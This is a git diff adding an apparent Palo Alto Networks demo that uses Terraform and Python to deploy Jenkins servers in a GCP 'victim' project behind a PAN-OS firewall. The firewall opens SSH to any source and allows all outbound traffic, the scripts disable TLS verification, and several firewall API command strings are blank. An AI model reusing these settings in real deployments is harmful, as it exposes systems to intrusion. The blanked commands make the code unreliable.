+ startup-script-url = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh"
+ serial-port-enable = true
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ "https://www.googleapis.com/auth/compute.readonly",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+ network_ip = "${var.Webserver_IP1}"
+ access_config = {}
+ }
+ depends_on = ["google_storage_bucket_object.config_file_webserver"]
+}
+resource "google_compute_instance" "jenkins2" {
+ name = "jenkins2"
+ project = "${google_project.victim_project.id}"
+ zone = "${var.GCP_Zone}"
+ machine_type = "n1-standard-1"
+ allow_stopping_for_update = true
+ depends_on = [
+ "google_storage_bucket_object.config_file_webserver",
+ "google_project_service.victim_project"
+ ]
+ metadata {
+ startup-script-url = "gs://${google_storage_bucket.bootstrap_bucket.name}/initialize_webserver.sh"
+ serial-port-enable = true
+ }
+
+ service_account {
+ scopes = [
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ "https://www.googleapis.com/auth/compute.readonly",
+ ]
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.trust_subnet.self_link}"
+ network_ip = "${var.Webserver_IP2}"
+ access_config = {}
+ }
+ depends_on = ["google_storage_bucket_object.config_file_webserver"]
+}
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
new file mode 100644
index 00000000..d9bdc901
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/firewallconfig.tf
@@ -0,0 +1,233 @@
+provider "panos" {
+ hostname = "${var.FW_Mgmt_IP}"
+ username = "${var.Admin_Username}"
+ password = "${var.Admin_Password}"
+}
+
+resource "panos_management_profile" "imp_allow_ping" {
+ name = "Allow ping"
+ ping = true
+}
+
+resource "panos_ethernet_interface" "eth1_1" {
+ name = "ethernet1/1"
+ vsys = "vsys1"
+ mode = "layer3"
+ comment = "External interface"
+ enable_dhcp = true
+ create_dhcp_default_route = true
+ management_profile = "${panos_management_profile.imp_allow_ping.name}"
+}
+
+resource "panos_ethernet_interface" "eth1_2" {
+ name = "ethernet1/2"
+ vsys = "vsys1"
+ mode = "layer3"
+ comment = "Web interface"
+ enable_dhcp = true
+}
+
+resource "panos_zone" "zone_untrust" {
+ name = "UNTRUST"
+ mode = "layer3"
+ interfaces = ["${panos_ethernet_interface.eth1_1.name}"]
+}
+
+resource "panos_zone" "zone_trust" {
+ name = "TRUST"
+ mode = "layer3"
+ interfaces = ["${panos_ethernet_interface.eth1_2.name}"]
+}
+
+resource "panos_service_object" "so_22" {
+ name = "service-tcp-22"
+ protocol = "tcp"
+ destination_port = "22"
+}
+
+resource "panos_service_object" "so_221" {
+ name = "service-tcp-221"
+ protocol = "tcp"
+ destination_port = "221"
+}
+
+resource "panos_service_object" "so_222" {
+ name = "service-tcp-222"
+ protocol = "tcp"
+ destination_port = "222"
+}
+
+resource "panos_address_object" "intLB" {
+ name = "GCP-Int-LB"
+ value = "${var.WebLB_IP}"
+ description = "GCP Int LB Address"
+}
+
+resource "panos_security_policies" "security_policies" {
+ rule {
+ name = "SSH inbound"
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_trust.name}"]
+ destination_addresses = ["any"]
+ applications = ["ssh", "ping"]
+ services = ["application-default"]
+ categories = ["any"]
+ action = "allow"
+ }
+
+ rule {
+ name = "SSH 221-222 inbound"
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_trust.name}"]
+ destination_addresses = ["any"]
+ applications = ["ssh", "ping"]
+ services = ["${panos_service_object.so_221.name}", "${panos_service_object.so_222.name}"]
+ categories = ["any"]
+ action = "allow"
+ }
+
+ rule {
+ name = "Allow all ping"
+ source_zones = ["any"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["any"]
+ destination_addresses = ["any"]
+ applications = ["ping"]
+ services = ["application-default"]
+ categories = ["any"]
+ action = "allow"
+ }
+
+ rule {
+ name = "Permit Health Checks"
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_trust.name}"]
+ destination_addresses = ["any"]
+ applications = ["google-health-check"]
+ services = ["service-http"]
+ categories = ["any"]
+ action = "allow"
+ }
+
+ rule {
+ name = "Web browsing"
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"]
+ destination_addresses = ["any"]
+ applications = ["web-browsing", "jenkins"]
+ services = ["service-http"]
+ categories = ["any"]
+ group = "Inbound"
+ action = "allow"
+ }
+
+ rule {
+ name = "Allow all outbound"
+ source_zones = ["${panos_zone.zone_trust.name}"]
+ source_addresses = ["any"]
+ source_users = ["any"]
+ hip_profiles = ["any"]
+ destination_zones = ["${panos_zone.zone_untrust.name}"]
+ destination_addresses = ["any"]
+ applications = ["any"]
+ services = ["application-default"]
+ categories = ["any"]
+ group = "Outbound"
+ action = "allow"
+ }
+}
+
+resource "panos_nat_rule_group" "nat" {
+ rule {
+ name = "Web1 SSH"
+ original_packet {
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ destination_zone = "${panos_zone.zone_untrust.name}"
+ source_addresses = ["any"]
+ destination_addresses = ["${var.FW_Untrust_IP}"]
+ service = "${panos_service_object.so_221.name}"
+ }
+ translated_packet {
+ source {
+ dynamic_ip_and_port {
+ interface_address {
+ interface = "${panos_ethernet_interface.eth1_2.name}"
+ }
+ }
+ }
+ destination {
+ static {
+ address = "${var.Webserver_IP1}"
+ port = 22
+ }
+ }
+ }
+ }
+ rule {
+ name = "Web2 SSH"
+ original_packet {
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ destination_zone = "${panos_zone.zone_untrust.name}"
+ source_addresses = ["any"]
+ destination_addresses = ["${var.FW_Untrust_IP}"]
+ service = "${panos_service_object.so_222.name}"
+ }
+ translated_packet {
+ source {
+ dynamic_ip_and_port {
+ interface_address {
+ interface = "${panos_ethernet_interface.eth1_2.name}"
+ }
+ }
+ }
+ destination {
+ static {
+ address = "${var.Webserver_IP2}"
+ port = 22
+ }
+ }
+ }
+ }
+ rule {
+ name = "Webserver NAT"
+ original_packet {
+ source_zones = ["${panos_zone.zone_untrust.name}"]
+ destination_zone = "${panos_zone.zone_untrust.name}"
+ source_addresses = ["any"]
+ destination_addresses = ["${var.FW_Untrust_IP}"]
+ service = "service-http"
+ }
+ translated_packet {
+ source {
+ dynamic_ip_and_port {
+ interface_address {
+ interface = "${panos_ethernet_interface.eth1_2.name}"
+ }
+ }
+ }
+ destination {
+ static {
+ address = "GCP-Int-LB"
+ }
+ }
+ }
+ }
+}
+resource "panos_virtual_router" "vr1" {
+ name = "default"
+ interfaces = ["${panos_ethernet_interface.eth1_1.name}", "${panos_ethernet_interface.eth1_2.name}"]
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf
new file mode 100644
index 00000000..879b9d9b
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf
@@ -0,0 +1,7 @@
+variable "FW_Mgmt_IP" {}
+variable "FW_Untrust_IP" {}
+variable "Webserver_IP1" {}
+variable "Webserver_IP2" {}
+variable "WebLB_IP" {}
+variable "Admin_Username" {}
+variable "Admin_Password" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars
new file mode 100644
index 00000000..ae5cfd65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars
@@ -0,0 +1,11 @@
+Admin_Username = ""
+
+Admin_Password = ""
+
+FW_Untrust_IP = "10.0.1.10"
+
+WebLB_IP = "10.0.2.30"
+
+Webserver_IP1 = "10.0.2.50"
+
+Webserver_IP2 = "10.0.2.60"
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/deploy.py b/gcp/Jenkins_proj-master/deploy.py
new file mode 100644
index 00000000..35b66a1e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/deploy.py
@@ -0,0 +1,653 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u -p -r -a
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+import requests
+import urllib3
+from google.cloud import storage
+
+
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+ """
+ Handles sending requests to API
+ :param call: url
+ :return: Retruns result of call. Will return response for codes between 200 and 400.
+ If 200 response code is required check value in response
+ """
+ headers = {'Accept-Encoding' : 'None',
+ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+ 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+ try:
+ r = requests.get(call, headers = headers, verify=False, timeout=5)
+ r.raise_for_status()
+ except requests.exceptions.HTTPError as errh:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ '''
+ logger.debug("DeployRequestException Http Error:")
+ raise DeployRequestException("Http Error:")
+ except requests.exceptions.ConnectionError as errc:
+ logger.debug("DeployRequestException Connection Error:")
+ raise DeployRequestException("Connection Error")
+ except requests.exceptions.Timeout as errt:
+ logger.debug("DeployRequestException Timeout Error:")
+ raise DeployRequestException("Timeout Error")
+ except requests.exceptions.RequestException as err:
+ logger.debug("DeployRequestException RequestException Error:")
+ raise DeployRequestException("Request Error")
+ else:
+ return r
+
+
+class DeployRequestException(Exception):
+ pass
+
+def walkdict(dict, match):
+ """
+ Finds a key in a dict or nested dict and returns the value associated with it
+ :param d: dict or nested dict
+ :param key: key value
+ :return: value associated with key
+ """
+ for key, v in dict.items():
+ if key == match:
+ jobid = v
+ return jobid
+ elif isinstance(v, OrderedDict):
+ found = walkdict(v, match)
+ if found is not None:
+ return found
+
+
+
+def update_fw(fwMgtIP, api_key):
+ """
+ Applies latest AppID, Threat and AV updates to firewall after launch
+ :param fwMgtIP: Firewall management IP
+ :param api_key: API key
+
+ """
+ # # Download latest applications and threats
+
+ type = "op"
+ cmd = ""
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid = 0
+ jobid = ''
+ key = 'job'
+
+ # FIXME - Remove Duplicate code for parsing jobid
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+ except:
+ DeployRequestException
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ # FIXME - Remove Duplicate code for showing job status
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+ call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+ except:
+ DeployRequestException
+ logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP download Complete ")
+ completed = 1
+ print("Download latest Applications and Threats update")
+ status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Checking job is complete')
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+ # Install latest content update
+ type = "op"
+ cmd = "latestno"
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid = 0
+ jobid = ''
+ key = 'job'
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+ except:
+ DeployRequestException
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+ call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+ except:
+ DeployRequestException
+ logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP Install Complete ")
+ completed = 1
+ print("Install latest Applications and Threats update")
+ status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Checking job is complete')
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+
+ # Download latest anti-virus update without committing
+ getjobid = 0
+ jobid = ''
+ type = "op"
+ cmd = ""
+ key = 'job'
+ while getjobid == 0:
+ try:
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ r = send_request(call)
+ logger.info('Got response to request AV install {}'.format(r.text))
+ except:
+ DeployRequestException
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+ call = "https://%s/api/?type=op&cmd=%s&key=%s" % (
+ fwMgtIP, jobid, api_key)
+ r = send_request(call)
+ tree = ET.fromstring(r.text)
+ logger.debug('Got response for show job {}'.format(r.text))
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.info("AV install Status Complete ")
+ completed = 1
+ else:
+ status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+
+def getApiKey(hostname, username, password):
+
+ """
+ Generates a Paloaltonetworks api key from username and password credentials
+ :param hostname: Ip address of firewall
+ :param username:
+ :param password:
+ :return: api_key API key for firewall
+ """
+
+
+ call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+ api_key = ""
+ while True:
+ try:
+ # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+ response = send_request(call)
+
+
+ except DeployRequestException as updateerr:
+ logger.info("No response from FW. Wait 20 secs before retry")
+ time.sleep(10)
+ continue
+
+ else:
+ api_key = ET.XML(response.content)[0][0].text
+ logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+ logger.debug("Response to get_api is {}".format(response))
+ return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+ fwip = fwIP
+
+ """
+ Gets the firewall status by sending the API request show chassis status.
+ :param fwMgtIP: IP Address of firewall interface to be probed
+ :param api_key: Panos API key
+ """
+
+ url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key)
+ # Send command to fw and see if it times out or we get a response
+ logger.info("Sending command 'show chassis status' to firewall")
+ try:
+ response = requests.get(url, verify=False, timeout=10)
+ response.raise_for_status()
+ except requests.exceptions.Timeout as fwdownerr:
+ logger.debug("No response from FW. So maybe not up!")
+ return 'no'
+ # sleep and check again?
+ except requests.exceptions.HTTPError as fwstartgerr:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ raise_for_status() throws HTTPError for error responses
+ '''
+ logger.infor("Http Error: {}: ".format(fwstartgerr))
+ return 'cmd_error'
+ except requests.exceptions.RequestException as err:
+ logger.debug("Got RequestException response from FW. So maybe not up!")
+ return 'cmd_error'
+ else:
+ logger.debug("Got response to 'show chassis status' {}".format(response))
+
+ resp_header = ET.fromstring(response.content)
+ logger.debug('Response header is {}'.format(resp_header))
+
+ if resp_header.tag != 'response':
+ logger.debug("Did not get a valid 'response' string...maybe a timeout")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'error':
+ logger.debug("Got an error for the command")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'success':
+ # The fw responded with a successful command execution. So is it ready?
+ for element in resp_header:
+ if element.text.rstrip() == 'yes':
+ logger.info("FW Chassis is ready to accept configuration and connections")
+ return 'yes'
+ else:
+ logger.info("FW Chassis not ready, still waiting for dataplane")
+ time.sleep(10)
+ return 'almost'
+
+
+def update_status(key, value):
+ """
+ For tracking purposes. Write responses to file.
+ :param key:
+ :param value:
+ :return:
+ """
+ global status_output
+
+ if type(status_output) is not dict:
+ logger.info('Creating new status_output object')
+ status_output = dict()
+
+ if key is not None and value is not None:
+ status_output[key] = value
+
+ # write status to file to future tracking
+ write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+ """
+ Writes the deployment state to a dict and outputs to file for status tracking
+ """
+ try:
+ message_json = json.dumps(message_dict)
+ with open('deployment_status.json', 'w+') as dpj:
+ dpj.write(message_json)
+
+ except ValueError as ve:
+ logger.error('Could not write status file!')
+ print('Could not write status file!')
+ sys.exit(1)
+
+
+
+
+def getServerStatus(IP):
+ """
+ Gets the server status by sending an HTTP request and checking for a 200 response code
+
+ """
+ global gcontext
+
+ call = ("http://" + IP + "/")
+ logger.info('URL request is {}'.format(call))
+ # Send command to fw and see if it times out or we get a response
+ count = 0
+ max_count = 18
+ while True:
+ if count < max_count:
+ time.sleep(10)
+ try:
+ count = count + 1
+ r = send_request(call)
+ except DeployRequestException as e:
+ logger.debug("Got Invalid response".format(e))
+ else:
+ logger.info('Jenkins Server responded with HTTP 200 code')
+ return 'server_up'
+ else:
+ break
+ return 'server_down'
+
+
+def apply_tf(working_dir, vars, description):
+
+ """
+ Handles terraform operations and returns variables in outputs.tf as a dict.
+ :param working_dir: Directory that contains the tf files
+ :param vars: Additional variables passed in to override defaults equivalent to -var
+ :param description: Description of the deployment for logging purposes
+ :return: return_code - 0 for success or other for failure
+ outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+ """
+ # Set run_plan to TRUE is you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ # Class Terraform uses subprocess and setting capture_output to True will capture output
+ capture_output = kwargs.pop('capture_output', False)
+
+ if capture_output is True:
+ stderr = subprocess.PIPE
+ stdout = subprocess.PIPE
+ else:
+ # if capture output is False, then everything will essentially go to stdout and stderrf
+ stderr = sys.stderr
+ stdout = sys.stdout
+
+ start_time = time.asctime()
+ print('Starting Deployment at {}\n'.format(start_time))
+
+ # Create Bootstrap
+
+ tf = Terraform(working_dir=working_dir)
+
+ tf.cmd('init')
+ if run_plan:
+
+ # print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output,
+ skip_plan = True, **kwargs)
+ outputs = tf.output()
+
+ logger.debug('Got Return code {} for deployment of {}'.format(return_code, description))
+
+ return (return_code, outputs)
+
+
+
+def main(username, password, GCP_region, Billing_Account ):
+
+ """
+ Main function
+ :param username:
+ :param password:
+ :param rg_name: Resource group name prefix
+ :param azure_region: Region
+ :return:
+ """
+ username = username
+ password = password
+ # TODO maybe use a zone lookup but for now use region-B
+ GCP_Zone = GCP_region + '-b'
+
+
+
+
+
+ WebInDeploy_vars = {
+ 'GCP_Zone': GCP_Zone,
+ 'GCP_Region': GCP_region,
+ 'Billing_Account': Billing_Account,
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ WebInFWConf_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ # Set run_plan to TRUE is you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ #
+ # Build Infrastructure
+ #
+ #
+
+ return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
+
+ logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
+
+
+ update_status('web_in_deploy_output', web_in_deploy_output)
+ if return_code == 0:
+ update_status('web_in_deploy_status', 'success')
+ albDns = web_in_deploy_output['ALB-DNS']['value']
+ nlbDns = web_in_deploy_output['NATIVE-DNS']['value']
+ fwMgtIP = web_in_deploy_output['FW_Mgmt_IP']['value']
+
+ logger.info("Got these values from output of WebInDeploy \n\n")
+ logger.info("AppGateway address is {}".format(albDns))
+ logger.info("Firewall Mgt address is {}".format(fwMgtIP))
+
+ else:
+ logger.info("WebInDeploy failed")
+ update_status('web_in_deploy_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+ #
+ # Check firewall is up and running
+ #
+ #
+
+ api_key = getApiKey(fwMgtIP, username, password)
+
+ while True:
+ err = getFirewallStatus(fwMgtIP, api_key)
+ if err == 'cmd_error':
+ logger.info("Command error from fw ")
+
+ elif err == 'no':
+ logger.info("FW is not up...yet")
+ # print("FW is not up...yet")
+ time.sleep(60)
+ continue
+
+ elif err == 'almost':
+ logger.info("MGT up waiting for dataplane")
+ time.sleep(20)
+ continue
+
+ elif err == 'yes':
+ logger.info("FW is up")
+ break
+
+ logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+ time.sleep(10)
+ fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+
+
+ logger.info("Updating firewall with latest content pack")
+ update_fw(fwMgtIP, api_key)
+
+ #
+ # Configure Firewall
+ #
+ WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+
+ logger.info("Applying addtional config to firewall")
+
+ return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
+ logger.debug('Got return code {}'.format(return_code))
+ if return_code == 0:
+ update_status('web_in_fw_conf', 'success')
+ logger.info("WebInFWConf succeeded")
+
+ else:
+ logger.info("WebInFWConf failed")
+ update_status('web_in_deploy_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+ logger.info("Commit changes to firewall")
+
+ fw.commit()
+ logger.info("waiting for commit")
+ time.sleep(60)
+ logger.info("waiting for commit")
+
+ #
+ # Check Jenkins
+ #
+
+ logger.info('Checking if Jenkins Server is ready')
+
+ res = getServerStatus(albDns)
+
+ if res == 'server_up':
+ logger.info('Jenkins Server is ready')
+ logger.info('\n\n ### Deployment Complete ###')
+ logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns))
+ else:
+ logger.info('Jenkins Server is down')
+ logger.info('\n\n ### Deployment Complete ###')
+
+ # dump out status to stdout
+ print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+ parser.add_argument('-a', '--GCP_Region', help='GCP Region', required=True)
+ # parser.add_argument('-r', '--GCP_Zone', help='GCP Zone', required=True)
+ parser.add_argument('-m', '--Billing_Account', help='Billing Account', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+ # GCP_Zone = args.GCP_Zone
+ GCP_Region = args.GCP_Region
+ Billing_Account = args.Billing_Account
+
+ main(username, password, GCP_Region, Billing_Account)
diff --git a/gcp/Jenkins_proj-master/destroy.py b/gcp/Jenkins_proj-master/destroy.py
new file mode 100644
index 00000000..a314e0d1
--- /dev/null
+++ b/gcp/Jenkins_proj-master/destroy.py
@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage:
+git
+python destroy.py
+
+"""
+
+import argparse
+import logging
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+def main(username, password):
+ username = username
+ password = password
+
+ WebInDeploy_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ WebInBootstrap_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ albDns = ''
+ nlbDns = ''
+ fwMgt = ''
+
+ # Set run_plan to TRUE is you wish to run terraform plan before apply
+ run_plan = False
+ deployment_status = {}
+ kwargs = {"auto-approve": True}
+
+ #
+ # Destroy Infrastructure
+ #
+ tf = Terraform(working_dir='./WebInDeploy')
+ rg_name = tf.output('RG_Name')
+
+ attack_rg_name = tf.output('Attacker_RG_Name')
+ logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
+
+ WebInDeploy_vars.update({'RG_Name': rg_name})
+ WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
+
+ if run_plan:
+ print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
+ # return_code1 =0
+ print('Got return code {}'.format(return_code1))
+
+ if return_code1 != 0:
+ logger.info("Failed to destroy build ")
+
+ exit()
+ else:
+
+ logger.info("Destroyed WebInDeploy ")
+
+
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+
+ main(username, password)
diff --git a/gcp/Jenkins_proj-master/gcp_login.py b/gcp/Jenkins_proj-master/gcp_login.py
new file mode 100644
index 00000000..ecec1f80
--- /dev/null
+++ b/gcp/Jenkins_proj-master/gcp_login.py
@@ -0,0 +1,23 @@
+import os
+"""
